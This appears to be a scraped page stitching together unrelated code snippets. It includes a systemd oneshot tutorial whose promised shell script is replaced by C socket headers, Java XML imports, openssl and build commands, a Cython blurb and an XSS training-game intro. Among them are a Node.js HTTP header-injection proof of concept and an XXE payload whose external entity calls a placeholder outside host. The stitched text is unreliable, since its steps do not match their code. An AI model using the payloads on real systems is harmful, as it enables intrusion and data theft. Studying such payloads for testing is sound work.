Services declared as oneshot are expected to take some action and exit immediatelly (thus, they are not really services,
no running processes remain). A common pattern for these type of service is to be defined by a setup and a teardown action.
Let's create a example foo service that when started creates a file, and when stopped it deletes it.
Create executable file /opt/foo/setup-foo.sh:
| #include <sys/socket.h> | |
| #include <sys/un.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| static void err_quit(const char * const msg) { | |
| puts(msg); | |
| exit(-1); | |
| } |
Chris Frohoff – Qualcomm Information Security and Risk Management
| var http = require('http'); | |
| var x = 'fooഊSet-Cookie: foo=bar'; | |
| http.createServer(function(req, res) { | |
| res.writeHead(302, {test:'?text=' + x}); | |
| res.end(); | |
| }).listen(7777); |
| import javax.xml.parsers.ParserConfigurationException; // catching unsupported features | |
| import javax.xml.parsers.SAXParser; | |
| import javax.xml.parsers.SAXParserFactory; | |
| import org.xml.sax.SAXNotRecognizedException; // catching unknown features | |
| import org.xml.sax.SAXNotSupportedException; // catching known but unsupported features | |
| import org.xml.sax.XMLReader; | |
| ... | |
# Key considerations for algorithm "RSA" ≥ 2048-bit
openssl genrsa -out server.key 2048
# Key considerations for algorithm "ECDSA" ≥ secp384r1
# List ECDSA the supported curves (openssl ecparam -list_curves)
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| curl -L -O http://ftp.gnu.org/gnu/autoconf/autoconf-2.69.tar.gz | |
| tar zxf autoconf-2.69.tar.gz | |
| cd autoconf-2.69 | |
| yum install -y openssl-devel | |
| ./configure | |
| make && make install |
Cython has two major benefits:
Cython gains most of it's benefit from statically typing arguments. However, statically typing is not required, in fact, regular python code is valid cython (but don't expect much of a speed up). By incrementally adding more type information, the code can speed up by several factors. This gist just provides a very basic usage of cython.
Welcome, recruit! Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps and you must learn to dispatch them, pronto!
At Google, we know very well how important these bugs are. In fact, Google is so serious about finding and fixing XSS issues that we are paying mercenaries up to $7,500 for dangerous XSS bugs discovered in our most sensitive products.
In this training program, you will learn to find and exploit XSS bugs. You'll use this knowledge to confuse and infuriate your adversaries by preventing such bugs from happening in your applications.
There will be cake at the end of the test.